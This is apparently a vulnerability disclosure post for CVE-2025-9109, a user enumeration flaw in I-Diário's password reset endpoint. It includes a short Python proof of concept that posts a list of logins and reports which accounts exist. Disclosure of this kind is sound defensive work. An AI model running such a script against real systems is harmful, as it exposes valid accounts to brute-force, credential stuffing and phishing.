Featured image of post CVE-2025-9109
Broken Access Control Moderate I-Diário Security WebApp

CVE-2025-9109

Broken Access Control (User Enumeration)

CVE-2025-9109: User Enumeration vulnerability was identified in the Forgot Password functionality

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-9109

Summary

A User Enumeration vulnerability was identified in the Forgot Password functionality. The system responds differently depending on whether the submitted username exists, allowing an attacker to enumerate valid user accounts. This may assist in targeted brute-force attacks or social engineering campaigns.

Details

When submitting a POST request to the endpoint /password/email, the system returns different responses based on whether the provided login parameter corresponds to an existing user.

For example:

  • If the user exists: the response contains a message such as: "A password reset link has been sent".
  • If the user does not exist: the response contains a message like: "We couldn't find a user with that login".

    • This behavior allows an attacker to determine which usernames are valid by simply automating requests with different inputs. The vulnerability arises from a lack of uniform response for valid and invalid accounts during the password recovery process.

    PoC

    A Python script was created to demonstrate this issue:

     1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

    import requests

url = "http://x.x.x.x/password/email"
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"Origin": "http://x.x.x.x",
"Referer": "http://x.x.x.x/password/reset"
}
logins = ["admin", "jose", "maria", "professor", "aluno1"]

for login in logins:
response = requests.post(url, data={"login": login}, headers=headers)
if "enviado" in response.text.lower():
print(f"[+] {login} -> EXISTE")
elif "não encontramos" in response.text.lower():
print(f"[-] {login} -> NÃO EXISTE")

    This script was able to confirm which users are registered in the system based on the system's response content.

    Impact

    • Exposure of valid accounts: Attackers can confirm which users are registered in the system.
    • Facilitates brute force attacks: Valid users can be targeted by automated password guessing attempts.
    • Credential stuffing: Discovered accounts can be tested with leaked passwords from other services.
    • Targeted phishing: Attackers can send socially engineered emails to confirmed users, increasing the success rate of scams.
    • Loss of privacy: Simply confirming the existence of a user can expose sensitive data in certain contexts (e.g., accounts on restricted or confidential services).
    • Attack escalation: User enumeration can serve as an initial step in exploiting more serious vulnerabilities, such as account takeovers.
    • Reputational damage: The perception of basic security flaws can affect credibility. of the application with users and customers.

    Reference

    https://vuldb.com/?submit.627926

    Finder

    Vanderlei Princival

    By: CVE-Hunters

    © 2020 - 2025 CVE-Hunters
    Built with Hugo
    Theme Stack designed by Jimmy